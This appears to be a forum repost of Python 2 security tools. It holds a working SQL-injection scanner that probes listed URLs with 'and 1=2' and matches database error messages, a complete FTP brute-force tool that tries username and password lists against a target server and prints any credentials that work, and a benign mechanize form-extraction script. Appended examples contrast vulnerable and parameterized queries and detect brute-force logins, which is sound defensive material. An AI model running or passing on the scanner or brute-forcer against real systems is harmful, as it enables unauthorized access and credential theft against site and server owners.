51Testing Software Testing Forum


[Resources] Python injection point finder tool

    Posted on 2017-8-31 13:57:32

    Python SQL Injection Scanner
    #!/usr/bin/python
    #-*-coding=utf-8-*-
    #Author:@xfk
    #blog:@blog.sina.com.cn/kaiyongdeng
    #Date:@2012-05-07
    #Example site:@http://www.apostilando.com/pagina.php?cod=1
    # Write the sites to scan into a file in the current directory, then run: python xxx.py xxx.txt

    import urllib
    import os
    import sys

    # Clear the terminal ("cls" on Windows, "clear" elsewhere)
    if os.name == "nt":
        os.system("cls")
    else:
        os.system("clear")

    def usage():
        # Join the arguments so the banner also works when no file was given
        print """
        =================SQL INJECTION=====================
        Usage:python %s %s
        """ % (sys.argv[0], " ".join(sys.argv[1:]))

    def scanner(url):
        # Fetch the page; skip this URL if the request fails
        try:
            page = urllib.urlopen(url).read()
        except:
            print "[-]Error!!!\n"
            return
    If a site is vulnerable to SQL injection, the page returns error messages like the following when you probe it with the basic test inputs.
        # Database error messages that show the input broke the query
        sqls = ("mysql_result(): supplied argument is not a valid MySQL result resource in",
                "[Microsoft][ODBC SQL Server Driver][SQL Server]",
                "Warning:ociexecute",
                "Warning: pq_query[function.pg-query]:")
        page = str(page.lower())
        check = 0
        for sql in sqls:
            # Case-insensitive comparison; one matching signature is enough
            if page.find(sql.lower()) != -1:
                check = 1
                break
        if check == 0:
            print "[-]"+url+" <No Vulneravel>"
        else:
            print "[+]"+url+" <Vulneravel>"

    def main(args):
        if len(args)!=1:
            usage()
            print "\t[-]Mode to use: %s <File>\n" % sys.argv[0]
            print "\t[-]Example: %s Site.txt\n" % sys.argv[0]
    #        print sys.argv[0],sys.argv[1],len(args)
            sys.exit(0)
        usage()
        try:
            f = open(str(sys.argv[1]),"r")
            urls = f.readlines()
    #        print urls
        except:
            print "[+]Error to open the file "+sys.argv[1]+""
            return(-1)
        f.close()
        i=0
        while i<len(urls):
            if urls[i].find("http://") == -1:
                urls[i] = "http://" + urls[i]
            urls[i] = urls[i].replace("\n","")
    #        Test with the basic methods, e.g. and 1=1, and 1=2, ', and check whether any error message from sqls appears
            a = scanner(urls[i]+"and 1=2")
            i+=1

    if __name__ == "__main__":
        main(sys.argv[1:])
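    FTP Brute Forcing Tool: Python FTP brute-force tool

    Create your own username and password dictionaries in the current directory, and the tool can crack the username and password.
    Reference link: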
    #!/usr/bin/env python
    #-*-coding = utf-8-*-
    #author:@xfk
    #blog:@blog.sina.com.cn/kaiyongdeng
    #date:@2012-05-08

    import sys, os, time
    from ftplib import FTP

    docs = """
        [*] This was written for educational purpose and pentest only. Use it at your own risk.
        [*] Author will be not responsible for any damage!
        [*] Toolname        : ftp_bf.py
        [*] Coder           :
        [*] Version         : 0.1
        [*] ample of use  : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
        """

    if sys.platform == 'linux' or sys.platform == 'linux2':
        clearing = 'clear'
    else:
        clearing = 'cls'
    os.system(clearing)

    R = "\033[31m"
    G = "\033[32m"
    Y = "\033[33m"
    END = "\033[0m"

    def logo():
        print G+"\n         |---------------------------------------------------------------|"
        print "        |                                                               |"
        print "        |          blog.sina.com.cn/kaiyongdeng                    |"
        print "        |            08/05/2012 ftp_bf.py v.0.1                     |"
        print "        |            FTP Brute Forcing Tool                       |"
        print "        |                                                               |"
        print "        |---------------------------------------------------------------|\n"
        print "    \n         [-] %s\n" % time.strftime("%X")
        print docs+END

    def help():
        print R+"[*]-t, --target            ip/hostname     <> Our target"
        print "[*]-u, --usernamelist      usernamelist    <> usernamelist path"
        print "[*]-p, --passwordlist      passwordlist    <> passwordlist path"
        print "[*]-h, --help              help            <> print this help"
        print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END
        sys.exit(1)

    def bf_login(hostname,username,password):
    #    sys.stdout.write("\r[!]Checking : %s " % (p))
    #    sys.stdout.flush()
        try:
            ftp = FTP(hostname)
            ftp.login(username, password)
            ftp.retrlines('list')
            ftp.quit()
            print Y+"\n[!] w00t,w00t!!! We did it ! "
            print "[+] Target : ",hostname, ""
            print "[+] User : ",username, ""
            print "[+] Password : ",password, ""+END
            return 1
    #        sys.exit(1)
        except Exception, e:
            pass
        except KeyboardInterrupt:
            print R+"\n[-] Exiting ...\n"+END
            sys.exit(1)

    def anon_login(hostname):
        try:
            print G+"\n[!] Checking for anonymous login.\n"+END
            ftp = FTP(hostname)
            ftp.login()
            ftp.retrlines('LIST')
            print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END

            ftp.quit()
        except Exception, e:
            print R+"\n[-] Anonymous login failed...\n"+END
            pass

    def main():
        logo()
        try:
            for arg in sys.argv:
                if arg.lower() == '-t' or arg.lower() == '--target':
                    hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
                    usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
                    passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
                elif arg.lower() == '-h' or arg.lower() == '--help':
                    help()
                elif len(sys.argv) <= 1:
                    help()
        except:
            print R+"[-]Cheak your parametars input\n"+END
            help()
        print G+"[!] BruteForcing target ..."+END
        anon_login(hostname)
    #    print "here is ok"
    #    print hostname
        try:
            usernames = open(usernamelist, "r")
            user = usernames.readlines()
            count1 = 0
            while count1 < len(user):
                user[count1] = user[count1].strip()
                count1 +=1
        except:
            print R+"\n[-] Cheak your usernamelist path\n"+END
            sys.exit(1)
    #    print "here is ok ",usernamelist,passwordlist
        try:
            passwords = open(passwordlist, "r")
            pwd = passwords.readlines()
            count2 = 0
            while count2 < len(pwd):
                pwd[count2] = pwd[count2].strip()
                count2 +=1
        except:
            print R+"\n[-] Check your passwordlist path\n"+END
            sys.exit(1)

        print G+"\n[+] Loaded:",len(user),"usernames"
        print "\n[+] Loaded:",len(pwd),"passwords"
        print "[+] Target:",hostname
        print "[+] Guessing...\n"+END

        for u in user:
            for p in pwd:
                result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
                if result != 1:
                    print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
                else:
                    print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
        if not result :
            print R+"\n[-]There is no username ans password enabled in the list."
            print "[-]Exiting...\n"+END

    if __name__ == "__main__":
        main()


    An awesome Python module: mechanize

    Today I found another handy, awesome Python module. Come and take a look, it is even handier than Python's own urllib and urllib2!!!
    Link: http://wwwsearch.sourceforge.net/mechanize/
    Below are the advantages of mechanize. How could you not be tempted after reading them!!!!????

    When I have time I will write an application with it. Stay tuned, let's go......

    • mechanize.Browser and mechanize.UserAgentBase implement the interface of urllib2.OpenerDirector, so:
      o any URL can be opened, not just http:
      o mechanize.UserAgentBase offers easy dynamic configuration of user-agent features like protocol, cookie, redirection and robots.txt handling, without having to make a new OpenerDirector each time, e.g. by calling build_opener().
    • Easy HTML form filling.
    • Convenient link parsing and following.
    • Browser history (.back() and .reload() methods).
    • The Referer HTTP header is added properly (optional).
    • Automatic observance of robots.txt.
    • Automatic handling of HTTP-Equiv and Refresh.
    Extracting web page form information

    #!/usr/bin/env python
    #-*-coding = utf-8-*-
    import mechanize
    import sys

    # Open the URL given on the command line and list every form on the page
    br = mechanize.Browser()
    response = br.open(sys.argv[1])
    for form in br.forms():
        print "name:[%r] id:[%r] action:[%s]" %(form.name, form.attrs.get('id'), form.action)
        print "Controls: "
        # Each control is one input field: its type, name and current value
        for control in form.controls:
            print '    ', control.type, control.name, repr(control.value)
        print(" ")



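    This is the simplest script for extracting web page form information with Python that I saw on OSChina; it is short and to the point. The key is its mechanize module. There is very little about this module online, so you have to figure it out yourself bit by bit!!!
    I found quite a few related sites online that cover this kind of web form extraction. If you are interested, have a look!!!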
    http://twill.idyll.org/python-api.html
    http://search.cpan.org/~jesse/WW ... ib/WWW/Mechanize.pm


    Reposted from http://zhan.renren.com/pythonfocus?checked=true
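Added example, not part of the original post or its author's code: why the probes named in the scanner's comment (`and 1=1`, `and 1=2`, `'`) change a page whose query is built by string concatenation, next to a hardened handler that gives them nothing to work with. It is written in Python 3 and assumes sqlite3 as a stand-in DBMS, a constructed `pages` table, and hypothetical handler names.

```python
import re
import sqlite3

def make_db():
    # Constructed sample data standing in for the table behind pagina.php?cod=1
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (cod INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)", [(1, "Home"), (2, "About")])
    return db

def render_vulnerable(db, cod):
    """Concatenates the parameter into the SQL text and echoes driver errors."""
    try:
        rows = db.execute("SELECT title FROM pages WHERE cod = " + cod).fetchall()
    except sqlite3.Error as exc:
        # The raw DBMS message lands in the page body; this is the kind of
        # text the scanner's signature list matches on.
        return "Warning: sqlite3: %s" % exc
    return rows[0][0] if rows else ""

def render_hardened(db, cod):
    """Validates the type, binds the value, and returns a generic error."""
    if not re.fullmatch(r"[0-9]{1,9}", cod):
        return "400 Bad Request"
    try:
        rows = db.execute("SELECT title FROM pages WHERE cod = ?", (int(cod),)).fetchall()
    except sqlite3.Error:
        return "500 Internal Server Error"   # details belong in the server log
    return rows[0][0] if rows else "404 Not Found"

def compare(cod):
    """Returns (vulnerable response, hardened response) for one parameter value."""
    db = make_db()
    try:
        return render_vulnerable(db, cod), render_hardened(db, cod)
    finally:
        db.close()

if __name__ == "__main__":
    for value in ("1", "1 and 1=1", "1 and 1=2", "1'"):
        print(repr(value), compare(value))
```

The vulnerable handler answers the three probes with three different pages (normal, empty, driver error), while the hardened one returns the same generic response for all of them.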
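Added example, not part of the original post: the server-side view of the FTP guessing loop above, as a sliding-window detector over login events. It is written in Python 3; the log lines are constructed in vsftpd's log style (an assumption about the server in use), and the function name and thresholds are hypothetical.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in vsftpd's log style (an assumption; not from the post).
SAMPLE_LOG = '''\
Tue May  8 10:00:01 2012 [pid 4101] [admin] FAIL LOGIN: Client "203.0.113.7"
Tue May  8 10:00:02 2012 [pid 4102] [admin] FAIL LOGIN: Client "203.0.113.7"
Tue May  8 10:00:03 2012 [pid 4103] [admin] FAIL LOGIN: Client "203.0.113.7"
Tue May  8 10:00:04 2012 [pid 4104] [backup] FAIL LOGIN: Client "203.0.113.7"
Tue May  8 10:00:05 2012 [pid 4105] [alice] FAIL LOGIN: Client "198.51.100.20"
Tue May  8 10:00:06 2012 [pid 4106] [backup] FAIL LOGIN: Client "203.0.113.7"
Tue May  8 10:00:09 2012 [pid 4107] [alice] OK LOGIN: Client "198.51.100.20"
Tue May  8 10:00:11 2012 [pid 4108] [backup] OK LOGIN: Client "203.0.113.7"
'''

LINE = re.compile(r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
                  r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"users": set, "login_after_alert": user or None}} for every
    client with >= threshold failed logins inside the sliding window."""
    recent = defaultdict(deque)   # ip -> (timestamp, user) of recent failures
    alerts = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue              # not a login event
        ts = datetime.strptime(" ".join(m.group("ts").split()), "%a %b %d %H:%M:%S %Y")
        ip, user = m.group("ip"), m.group("user")
        failures = recent[ip]
        while failures and ts - failures[0][0] > window:
            failures.popleft()    # drop failures that left the window
        if m.group("result") == "FAIL":
            failures.append((ts, user))
            if len(failures) >= threshold:
                alert = alerts.setdefault(ip, {"users": set(), "login_after_alert": None})
                alert["users"].update(u for _, u in failures)
        elif ip in alerts and alerts[ip]["login_after_alert"] is None:
            # A success from a client that already alerted: review that account
            alerts[ip]["login_after_alert"] = user
    return alerts

if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_LOG).items():
        print(ip, sorted(alert["users"]), alert["login_after_alert"])
```

A single mistyped password followed by a success, as from 198.51.100.20 in the sample, stays below the threshold and raises nothing.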

